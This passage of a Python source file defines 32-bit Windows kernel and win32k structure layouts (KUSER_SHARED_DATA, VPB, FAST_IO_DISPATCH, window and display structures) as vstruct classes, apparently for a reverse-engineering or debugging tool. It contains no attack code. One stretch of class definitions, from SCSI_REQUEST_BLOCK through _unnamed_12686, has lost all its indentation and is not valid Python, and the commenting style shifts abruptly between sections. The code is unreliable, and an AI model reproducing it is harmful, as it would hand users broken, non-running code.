        self.ByteCount = v_uint32()
        self.ByteOffset = v_uint32()
# Single-dword message pump info index.
class tagMSGPPINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwIndexMsgPP = v_uint32()
# Tagged window-pointer list element.
class VWPLELEMENT(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DataOrTag = v_uint32()
        self.pwnd = v_ptr32()
# Opaque placeholder (no fields emitted).
class IO_TIMER(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
# Keyboard layout scan-code to virtual-key mapping entry.
class VSC_VK(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Vsc = v_uint8()
        self._pad0002 = v_bytes(size=1)
        self.Vk = v_uint16()
# WHEA record revision: minor byte precedes major byte (cper.h layout).
class WHEA_REVISION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MinorRevision = v_uint8()
        self.MajorRevision = v_uint8()
# win32k magnifier input transform: source/screen rects and scale factors.
class MAGNIFICATION_INPUT_TRANSFORM(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.rcSource = tagRECT()
        self.rcScreen = tagRECT()
        self.ptiMagThreadInfo = v_ptr32()
        self.magFactorX = v_uint32()
        self.magFactorY = v_uint32()
# Opaque placeholder (no fields emitted).
class TP_CLEANUP_GROUP(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
# Display-mode-manager serialization: a present path plus a single target mode.
class DMM_VIDPNPATHANDTARGETMODE_SERIALIZATION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PathInfo = D3DKMDT_VIDPN_PRESENT_PATH()
        self.TargetMode = D3DKMDT_VIDPN_TARGET_MODE()
# Copy-protection support flags (bitfield collapsed to one dword here).
class D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_SUPPORT(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NoProtection = v_uint32()
# DXGI gamma-ramp RGB triple.
class D3DDDI_DXGI_RGB(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Red = v_uint32()
        self.Green = v_uint32()
        self.Blue = v_uint32()
# Object-type initializer (ObCreateObjectType): access masks, pool charges,
# and the per-type procedure table (open/close/delete/parse/...).
class OBJECT_TYPE_INITIALIZER(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint16()
        self.ObjectTypeFlags = v_uint8()
        self._pad0004 = v_bytes(size=1)
        self.ObjectTypeCode = v_uint32()
        self.InvalidAttributes = v_uint32()
        self.GenericMapping = GENERIC_MAPPING()
        self.ValidAccessMask = v_uint32()
        self.RetainAccess = v_uint32()
        self.PoolType = v_uint32()
        self.DefaultPagedPoolCharge = v_uint32()
        self.DefaultNonPagedPoolCharge = v_uint32()
        self.DumpProcedure = v_ptr32()
        self.OpenProcedure = v_ptr32()
        self.CloseProcedure = v_ptr32()
        self.DeleteProcedure = v_ptr32()
        self.ParseProcedure = v_ptr32()
        self.SecurityProcedure = v_ptr32()
        self.QueryNameProcedure = v_ptr32()
        self.OkayToCloseProcedure = v_ptr32()
# win32k window move/size tracking state (drag rectangles, hit targets).
class MOVESIZEDATA(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.spwnd = v_ptr32()
        self.rcDrag = tagRECT()
        self.rcDragCursor = tagRECT()
        self.rcPreview = tagRECT()
        self.rcPreviewCursor = tagRECT()
        self.rcParent = tagRECT()
        self.ptMinTrack = tagPOINT()
        self.ptMaxTrack = tagPOINT()
        self.rcWindow = tagRECT()
        self.rcNormalStartCheckPt = tagRECT()
        self.dxMouse = v_uint32()
        self.dyMouse = v_uint32()
        self.cmd = v_uint32()
        self.impx = v_uint32()
        self.impy = v_uint32()
        self.ptRestore = tagPOINT()
        self.Flags = v_uint32()
        self.pStartMonitorCurrentHitTarget = v_ptr32()
        self.StartCurrentHitTarget = v_uint32()
        self.pMonitorCurrentHitTarget = v_ptr32()
        self.CurrentHitTarget = v_uint32()
        self.MoveRectStyle = v_uint32()
        self.ptHitWindowRelative = tagPOINT()
        self.ptStartHitWindowRelative = tagPOINT()
        self.ptLastTrack = tagPOINT()
        self.ulCountDragOutOfTopTarget = v_uint32()
        self.ulCountDragOutOfLeftRightTarget = v_uint32()
        self.ulCountSizeOutOfTopBottomTarget = v_uint32()
class SCSI_REQUEST_BLOCK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class _unnamed_16620(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length64 = v_uint32()
self.Alignment64 = v_uint32()
self.MinimumAddress = LARGE_INTEGER()
self.MaximumAddress = LARGE_INTEGER()
class TLSPRITESTATE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.bInsideDriverCall = v_uint8()
self._pad0004 = v_bytes(size=3)
self.flOriginalSurfFlags = v_uint32()
self.iOriginalType = v_uint32()
self.flSpriteSurfFlags = v_uint32()
self.iSpriteType = v_uint32()
self.flags = v_uint32()
self.iType = v_uint32()
self.pState = v_ptr32()
self.pfnStrokeAndFillPath = v_ptr32()
self.pfnStrokePath = v_ptr32()
self.pfnFillPath = v_ptr32()
self.pfnPaint = v_ptr32()
self.pfnBitBlt = v_ptr32()
self.pfnCopyBits = v_ptr32()
self.pfnStretchBlt = v_ptr32()
self.pfnTextOut = v_ptr32()
self.pfnLineTo = v_ptr32()
self.pfnTransparentBlt = v_ptr32()
self.pfnAlphaBlend = v_ptr32()
self.pfnPlgBlt = v_ptr32()
self.pfnGradientFill = v_ptr32()
self.pfnSaveScreenBits = v_ptr32()
self.pfnStretchBltROP = v_ptr32()
self.pfnDrawStream = v_ptr32()
class _unnamed_15886(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pRgb256x3x16 = v_ptr32()
class tagQMSG(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pqmsgNext = v_ptr32()
self.pqmsgPrev = v_ptr32()
self.msg = tagMSG()
self.ExtraInfo = v_uint32()
self.ptMouseReal = tagPOINT()
self.dwQEvent = v_uint32()
self.Wow64Message = v_uint32()
self.pti = v_ptr32()
self.MsgPPInfo = tagMSGPPINFO()
class PAGED_LOOKASIDE_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.L = GENERAL_LOOKASIDE()
self.Lock__ObsoleteButDoNotDelete = FAST_MUTEX()
class RTL_BITMAP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SizeOfBitMap = v_uint32()
self.Buffer = v_ptr32()
class LARGE_INTEGER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LowPart = v_uint32()
self.HighPart = v_uint32()
class HICON(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class NPAGED_LOOKASIDE_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.L = GENERAL_LOOKASIDE()
self.Lock__ObsoleteButDoNotDelete = v_uint32()
self._pad0050 = v_bytes(size=4)
class _unnamed_12830(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.InPath = v_uint8()
self.Reserved = vstruct.VArray([ v_uint8() for i in xrange(3) ])
self.Type = v_uint32()
class tagWin32PoolHead(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.size = v_uint32()
self.pPrev = v_ptr32()
self.pNext = v_ptr32()
self.pTrace = v_ptr32()
class _unnamed_12686(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.FsInformationClass = v_uint32()
class VPB(vstruct.VStruct):
    """Vstruct layout of Windows ``VPB`` (Volume Parameter Block, 32-bit); field order fixes the binary layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint16()
        self.Size = v_uint16()
        self.Flags = v_uint16()
        self.VolumeLabelLength = v_uint16()
        self.DeviceObject = v_ptr32()
        self.RealDevice = v_ptr32()
        self.SerialNumber = v_uint32()
        self.ReferenceCount = v_uint32()
        self.VolumeLabel = vstruct.VArray([ v_uint16() for i in xrange(32) ])
class _unnamed_12689(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably the FileSystemControl IRP parameters."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.OutputBufferLength = v_uint32()
        self.InputBufferLength = v_uint32()
        self.FsControlCode = v_uint32()
        self.Type3InputBuffer = v_ptr32()
class HEAD(vstruct.VStruct):
    """Vstruct layout of win32k ``HEAD`` (handle + lock count); field order fixes the binary layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.h = v_ptr32()
        self.cLockObj = v_uint32()
class OBJECT_NAME_INFORMATION(vstruct.VStruct):
    """Vstruct layout of Windows ``OBJECT_NAME_INFORMATION`` (a single UNICODE_STRING)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Name = UNICODE_STRING()
class IO_RESOURCE_LIST(vstruct.VStruct):
    """Vstruct layout of Windows ``IO_RESOURCE_LIST``; Descriptors is a variable-length array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Version = v_uint16()
        self.Revision = v_uint16()
        self.Count = v_uint32()
        self.Descriptors = vstruct.VArray([ IO_RESOURCE_DESCRIPTOR() for i in xrange(1) ])
class KUSER_SHARED_DATA(vstruct.VStruct):
    """Vstruct layout of Windows ``KUSER_SHARED_DATA`` (shared user/kernel data page, 32-bit).

    Field order and the explicit ``_pad`` members fix the binary layout; do not reorder.
    """
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.TickCountLowDeprecated = v_uint32()
        self.TickCountMultiplier = v_uint32()
        self.InterruptTime = KSYSTEM_TIME()
        self.SystemTime = KSYSTEM_TIME()
        self.TimeZoneBias = KSYSTEM_TIME()
        self.ImageNumberLow = v_uint16()
        self.ImageNumberHigh = v_uint16()
        self.NtSystemRoot = vstruct.VArray([ v_uint16() for i in xrange(260) ])
        self.MaxStackTraceDepth = v_uint32()
        self.CryptoExponent = v_uint32()
        self.TimeZoneId = v_uint32()
        self.LargePageMinimum = v_uint32()
        self.Reserved2 = vstruct.VArray([ v_uint32() for i in xrange(7) ])
        self.NtProductType = v_uint32()
        self.ProductTypeIsValid = v_uint8()
        self._pad026c = v_bytes(size=3)
        self.NtMajorVersion = v_uint32()
        self.NtMinorVersion = v_uint32()
        self.ProcessorFeatures = vstruct.VArray([ v_uint8() for i in xrange(64) ])
        self.Reserved1 = v_uint32()
        self.Reserved3 = v_uint32()
        self.TimeSlip = v_uint32()
        self.AlternativeArchitecture = v_uint32()
        self.AltArchitecturePad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
        self.SystemExpirationDate = LARGE_INTEGER()
        self.SuiteMask = v_uint32()
        self.KdDebuggerEnabled = v_uint8()
        self.NXSupportPolicy = v_uint8()
        self._pad02d8 = v_bytes(size=2)
        self.ActiveConsoleId = v_uint32()
        self.DismountCount = v_uint32()
        self.ComPlusPackage = v_uint32()
        self.LastSystemRITEventTickCount = v_uint32()
        self.NumberOfPhysicalPages = v_uint32()
        self.SafeBootMode = v_uint8()
        self.TscQpcData = v_uint8()
        self.TscQpcPad = vstruct.VArray([ v_uint8() for i in xrange(2) ])
        self.SharedDataFlags = v_uint32()
        self.DataFlagsPad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
        self.TestRetInstruction = v_uint64()
        self.SystemCall = v_uint32()
        self.SystemCallReturn = v_uint32()
        self.SystemCallPad = vstruct.VArray([ v_uint64() for i in xrange(3) ])
        self.TickCount = KSYSTEM_TIME()
        self.TickCountPad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
        self.Cookie = v_uint32()
        self.CookiePad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
        self.ConsoleSessionForegroundProcessId = v_uint64()
        self.Wow64SharedInformation = vstruct.VArray([ v_uint32() for i in xrange(16) ])
        self.UserModeGlobalLogger = vstruct.VArray([ v_uint16() for i in xrange(16) ])
        self.ImageFileExecutionOptions = v_uint32()
        self.LangGenerationCount = v_uint32()
        self.Reserved5 = v_uint64()
        self.InterruptTimeBias = v_uint64()
        self.TscQpcBias = v_uint64()
        self.ActiveProcessorCount = v_uint32()
        self.ActiveGroupCount = v_uint16()
        self.Reserved4 = v_uint16()
        self.AitSamplingValue = v_uint32()
        self.AppCompatFlag = v_uint32()
        self.SystemDllNativeRelocation = v_uint64()
        self.SystemDllWowRelocation = v_uint32()
        self.XStatePad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
        self.XState = XSTATE_CONFIGURATION()
class SYSTEM_POWER_STATE_CONTEXT(vstruct.VStruct):
    """Vstruct layout of Windows ``SYSTEM_POWER_STATE_CONTEXT`` (bitfields collapsed to one dword)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Reserved1 = v_uint32()
class _unnamed_12707(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably the SetSecurity IRP parameters."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SecurityInformation = v_uint32()
        self.SecurityDescriptor = v_ptr32()
class _unnamed_12704(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably the QuerySecurity IRP parameters."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SecurityInformation = v_uint32()
        self.Length = v_uint32()
class IO_STATUS_BLOCK(vstruct.VStruct):
    """Vstruct layout of Windows ``IO_STATUS_BLOCK`` (32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Status = v_uint32()
        self.Information = v_uint32()
class PRIVILEGE_SET(vstruct.VStruct):
    """Vstruct layout of Windows ``PRIVILEGE_SET``; Privilege is a variable-length array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PrivilegeCount = v_uint32()
        self.Control = v_uint32()
        self.Privilege = vstruct.VArray([ LUID_AND_ATTRIBUTES() for i in xrange(1) ])
class CM_RESOURCE_LIST(vstruct.VStruct):
    """Vstruct layout of Windows ``CM_RESOURCE_LIST``; List is a variable-length array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Count = v_uint32()
        self.List = vstruct.VArray([ CM_FULL_RESOURCE_DESCRIPTOR() for i in xrange(1) ])
class _unnamed_12666(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably the SetFile IRP parameters."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.FileInformationClass = v_uint32()
        self.FileObject = v_ptr32()
        self.ReplaceIfExists = v_uint8()
        self.AdvanceOnly = v_uint8()
        self._pad0010 = v_bytes(size=2)
class EPROCESS(vstruct.VStruct):
    """Opaque placeholder for Windows ``EPROCESS``; no fields were emitted by the generator."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
class _unnamed_12660(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); Length plus notify completion filter."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.CompletionFilter = v_uint32()
class _unnamed_12663(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); Length plus file information class."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.FileInformationClass = v_uint32()
class tagPROFILEVALUEINFO(vstruct.VStruct):
    """Vstruct layout of win32k ``tagPROFILEVALUEINFO``; field order fixes the binary layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwValue = v_uint32()
        self.uSection = v_uint32()
        self.pwszKeyName = v_ptr32()
class TP_TASK(vstruct.VStruct):
    """Vstruct layout of Windows ``TP_TASK`` (thread-pool task, 32-bit); pad preserves alignment."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Callbacks = v_ptr32()
        self.NumaNode = v_uint32()
        self.IdealProcessor = v_uint8()
        self._pad000c = v_bytes(size=3)
        self.PostGuard = TP_NBQ_GUARD()
        self.NBQNode = v_ptr32()
class TEB_ACTIVE_FRAME_CONTEXT(vstruct.VStruct):
    """Vstruct layout of Windows ``TEB_ACTIVE_FRAME_CONTEXT`` (32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flags = v_uint32()
        self.FrameName = v_ptr32()
class PFNCLIENTWORKER(vstruct.VStruct):
    """Vstruct layout of win32k ``PFNCLIENTWORKER`` (table of user-mode window-proc pointers)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pfnButtonWndProc = v_ptr32()
        self.pfnComboBoxWndProc = v_ptr32()
        self.pfnComboListBoxProc = v_ptr32()
        self.pfnDialogWndProc = v_ptr32()
        self.pfnEditWndProc = v_ptr32()
        self.pfnListBoxWndProc = v_ptr32()
        self.pfnMDIClientWndProc = v_ptr32()
        self.pfnStaticWndProc = v_ptr32()
        self.pfnImeWndProc = v_ptr32()
        self.pfnGhostWndProc = v_ptr32()
        self.pfnCtfHookProc = v_ptr32()
class DMM_COMMITVIDPNREQUESTSET_SERIALIZATION(vstruct.VStruct):
    """Vstruct layout of ``DMM_COMMITVIDPNREQUESTSET_SERIALIZATION``; offset array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NumCommitVidPnRequests = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.CommitVidPnRequestOffset = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class D3DKMDT_MONITOR_SOURCE_MODE(vstruct.VStruct):
    """Vstruct layout of ``D3DKMDT_MONITOR_SOURCE_MODE``; field order fixes the binary layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Id = v_uint32()
        self.VideoSignalInfo = D3DKMDT_VIDEO_SIGNAL_INFO()
        self.ColorBasis = v_uint32()
        self.ColorCoeffDynamicRanges = D3DKMDT_COLOR_COEFF_DYNAMIC_RANGES()
        self.Origin = v_uint32()
        self.Preference = v_uint32()
class tagDISPLAYINFO(vstruct.VStruct):
    """Vstruct layout of win32k ``tagDISPLAYINFO`` (32-bit); field order fixes the binary layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.hDev = v_ptr32()
        self.pmdev = v_ptr32()
        self.hDevInfo = v_ptr32()
        self.hdcScreen = v_ptr32()
        self.hdcBits = v_ptr32()
        self.hdcGray = v_ptr32()
        self.hbmGray = v_ptr32()
        self.cxGray = v_uint32()
        self.cyGray = v_uint32()
        self.pdceFirst = v_ptr32()
        self.pspbFirst = v_ptr32()
        self.cMonitors = v_uint32()
        self.pMonitorPrimary = v_ptr32()
        self.pMonitorFirst = v_ptr32()
        self.rcScreenReal = tagRECT()
        self.hrgnScreenReal = v_ptr32()
        self.dmLogPixels = v_uint16()
        self.BitCountMax = v_uint16()
        self.fDesktopIsRect = v_uint32()
        self.DockThresholdMax = v_uint32()
        self.SpatialListHead = KLIST_ENTRY()
        self.cFullScreen = v_uint16()
        self.Spare0 = v_uint16()
class CM_PARTIAL_RESOURCE_DESCRIPTOR(vstruct.VStruct):
    """Vstruct layout of Windows ``CM_PARTIAL_RESOURCE_DESCRIPTOR``; ``u`` is the generated union arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint8()
        self.ShareDisposition = v_uint8()
        self.Flags = v_uint16()
        self.u = _unnamed_15793()
class _unnamed_13381(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); graphics rendering format union arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Graphics = D3DKMDT_GRAPHICS_RENDERING_FORMAT()
class HRGN(vstruct.VStruct):
    """Opaque Windows ``HRGN`` handle modeled as a single 32-bit value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class OBJECT_ATTRIBUTES(vstruct.VStruct):
    """Vstruct layout of Windows ``OBJECT_ATTRIBUTES`` (32-bit); field order fixes the binary layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.RootDirectory = v_ptr32()
        self.ObjectName = v_ptr32()
        self.Attributes = v_uint32()
        self.SecurityDescriptor = v_ptr32()
        self.SecurityQualityOfService = v_ptr32()
class _unnamed_16067(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably an interrupt resource descriptor arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Level = v_uint16()
        self.Group = v_uint16()
        self.Vector = v_uint32()
        self.Affinity = v_uint32()
class CM_FULL_RESOURCE_DESCRIPTOR(vstruct.VStruct):
    """Vstruct layout of Windows ``CM_FULL_RESOURCE_DESCRIPTOR``."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.InterfaceType = v_uint32()
        self.BusNumber = v_uint32()
        self.PartialResourceList = CM_PARTIAL_RESOURCE_LIST()
class _unnamed_16064(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); generic Start/Length resource range."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Start = LARGE_INTEGER()
        self.Length = v_uint32()
class FAST_IO_DISPATCH(vstruct.VStruct):
    """Vstruct layout of Windows ``FAST_IO_DISPATCH`` (table of fast-I/O callback pointers, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SizeOfFastIoDispatch = v_uint32()
        self.FastIoCheckIfPossible = v_ptr32()
        self.FastIoRead = v_ptr32()
        self.FastIoWrite = v_ptr32()
        self.FastIoQueryBasicInfo = v_ptr32()
        self.FastIoQueryStandardInfo = v_ptr32()
        self.FastIoLock = v_ptr32()
        self.FastIoUnlockSingle = v_ptr32()
        self.FastIoUnlockAll = v_ptr32()
        self.FastIoUnlockAllByKey = v_ptr32()
        self.FastIoDeviceControl = v_ptr32()
        self.AcquireFileForNtCreateSection = v_ptr32()
        self.ReleaseFileForNtCreateSection = v_ptr32()
        self.FastIoDetachDevice = v_ptr32()
        self.FastIoQueryNetworkOpenInfo = v_ptr32()
        self.AcquireForModWrite = v_ptr32()
        self.MdlRead = v_ptr32()
        self.MdlReadComplete = v_ptr32()
        self.PrepareMdlWrite = v_ptr32()
        self.MdlWriteComplete = v_ptr32()
        self.FastIoReadCompressed = v_ptr32()
        self.FastIoWriteCompressed = v_ptr32()
        self.MdlReadCompleteCompressed = v_ptr32()
        self.MdlWriteCompleteCompressed = v_ptr32()
        self.FastIoQueryOpen = v_ptr32()
        self.ReleaseForModWrite = v_ptr32()
        self.AcquireForCcFlush = v_ptr32()
        self.ReleaseForCcFlush = v_ptr32()
class VSC_LPWSTR(vstruct.VStruct):
    """Vstruct layout of keyboard-layout ``VSC_LPWSTR`` (scan code + string pointer); pad preserves alignment."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.vsc = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.pwsz = v_ptr32()
class _unnamed_12389(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); single MasterIrp pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MasterIrp = v_ptr32()
class KFLOATING_SAVE(vstruct.VStruct):
    """Vstruct layout of Windows ``KFLOATING_SAVE`` (x87 FPU state save area, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ControlWord = v_uint32()
        self.StatusWord = v_uint32()
        self.ErrorOffset = v_uint32()
        self.ErrorSelector = v_uint32()
        self.DataOffset = v_uint32()
        self.DataSelector = v_uint32()
        self.Cr0NpxState = v_uint32()
        self.Spare1 = v_uint32()
class RTL_DYNAMIC_HASH_TABLE_CONTEXT(vstruct.VStruct):
    """Vstruct layout of Windows ``RTL_DYNAMIC_HASH_TABLE_CONTEXT`` (32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ChainHead = v_ptr32()
        self.PrevLinkage = v_ptr32()
        self.Signature = v_uint32()
class tagSBDATA(vstruct.VStruct):
    """Vstruct layout of win32k ``tagSBDATA`` (scroll-bar range/position data)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.posMin = v_uint32()
        self.posMax = v_uint32()
        self.page = v_uint32()
        self.pos = v_uint32()
class D3DDDI_GAMMA_RAMP_RGB256x3x16(vstruct.VStruct):
    """Vstruct layout of ``D3DDDI_GAMMA_RAMP_RGB256x3x16`` (256-entry 16-bit R/G/B gamma ramps)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Red = vstruct.VArray([ v_uint16() for i in xrange(256) ])
        self.Green = vstruct.VArray([ v_uint16() for i in xrange(256) ])
        self.Blue = vstruct.VArray([ v_uint16() for i in xrange(256) ])
class tagUAHMENUPOPUPMETRICS(vstruct.VStruct):
    """Vstruct layout of win32k ``tagUAHMENUPOPUPMETRICS``."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.rgcx = vstruct.VArray([ v_uint32() for i in xrange(4) ])
        self.fUpdateMaxWidths = v_uint32()
class THROBJHEAD(vstruct.VStruct):
    """Vstruct layout of win32k ``THROBJHEAD`` (thread-owned object header: handle, lock count, owning pti)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.h = v_ptr32()
        self.cLockObj = v_uint32()
        self.pti = v_ptr32()
class DMM_VIDPNTARGETMODESET_SERIALIZATION(vstruct.VStruct):
    """Vstruct layout of ``DMM_VIDPNTARGETMODESET_SERIALIZATION``; mode array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NumModes = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.ModeSerialization = vstruct.VArray([ D3DKMDT_VIDPN_TARGET_MODE() for i in xrange(1) ])
class KSPECIAL_REGISTERS(vstruct.VStruct):
    """Vstruct layout of Windows x86 ``KSPECIAL_REGISTERS`` (control/debug registers and descriptor tables)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Cr0 = v_uint32()
        self.Cr2 = v_uint32()
        self.Cr3 = v_uint32()
        self.Cr4 = v_uint32()
        self.KernelDr0 = v_uint32()
        self.KernelDr1 = v_uint32()
        self.KernelDr2 = v_uint32()
        self.KernelDr3 = v_uint32()
        self.KernelDr6 = v_uint32()
        self.KernelDr7 = v_uint32()
        self.Gdtr = DESCRIPTOR()
        self.Idtr = DESCRIPTOR()
        self.Tr = v_uint16()
        self.Ldtr = v_uint16()
        self.Reserved = vstruct.VArray([ v_uint32() for i in xrange(6) ])
class TP_NBQ_GUARD(vstruct.VStruct):
    """Vstruct layout of Windows ``TP_NBQ_GUARD`` (thread-pool non-blocking-queue guard)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.GuardLinks = LIST_ENTRY()
        self.Guards = vstruct.VArray([ v_ptr32() for i in xrange(2) ])
class RTL_CRITICAL_SECTION(vstruct.VStruct):
    """Vstruct layout of Windows ``RTL_CRITICAL_SECTION`` (32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DebugInfo = v_ptr32()
        self.LockCount = v_uint32()
        self.RecursionCount = v_uint32()
        self.OwningThread = v_ptr32()
        self.LockSemaphore = v_ptr32()
        self.SpinCount = v_uint32()
class KSYSTEM_TIME(vstruct.VStruct):
    """Vstruct layout of Windows ``KSYSTEM_TIME`` (low part plus doubled high part for tear-free reads)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.LowPart = v_uint32()
        self.High1Time = v_uint32()
        self.High2Time = v_uint32()
class tagTOUCHINPUT(vstruct.VStruct):
    """Vstruct layout of Windows ``TOUCHINPUT`` (32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.x = v_uint32()
        self.y = v_uint32()
        self.hSource = v_ptr32()
        self.dwID = v_uint32()
        self.dwFlags = v_uint32()
        self.dwMask = v_uint32()
        self.dwTime = v_uint32()
        self.dwExtraInfo = v_uint32()
        self.cxContact = v_uint32()
        self.cyContact = v_uint32()
class WNDMSG(vstruct.VStruct):
    """Vstruct layout of win32k ``WNDMSG`` (message table: count plus bitmap pointer)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.maxMsgs = v_uint32()
        self.abMsgs = v_ptr32()
class D3DDDI_RATIONAL(vstruct.VStruct):
    """Vstruct layout of ``D3DDDI_RATIONAL`` (numerator/denominator pair)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Numerator = v_uint32()
        self.Denominator = v_uint32()
class LUID_AND_ATTRIBUTES(vstruct.VStruct):
    """Vstruct layout of Windows ``LUID_AND_ATTRIBUTES``."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Luid = LUID()
        self.Attributes = v_uint32()
class tagSBTRACK(vstruct.VStruct):
    """Vstruct layout of win32k ``tagSBTRACK`` (scroll-bar tracking state, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.fHitOld = v_uint32()
        self.spwndTrack = v_ptr32()
        self.spwndSB = v_ptr32()
        self.spwndSBNotify = v_ptr32()
        self.rcTrack = tagRECT()
        self.xxxpfnSB = v_ptr32()
        self.cmdSB = v_uint32()
        self.hTimerSB = v_uint32()
        self.dpxThumb = v_uint32()
        self.pxOld = v_uint32()
        self.posOld = v_uint32()
        self.posNew = v_uint32()
        self.nBar = v_uint32()
        self.pSBCalc = v_ptr32()
class KPROCESSOR_STATE(vstruct.VStruct):
    """Vstruct layout of Windows ``KPROCESSOR_STATE`` (full CONTEXT plus special registers)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ContextFrame = CONTEXT()
        self.SpecialRegisters = KSPECIAL_REGISTERS()
class KTHREAD(vstruct.VStruct):
    """Opaque placeholder for Windows ``KTHREAD``; no fields were emitted by the generator."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
class HFONT(vstruct.VStruct):
    """Opaque Windows ``HFONT`` handle modeled as a single 32-bit value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
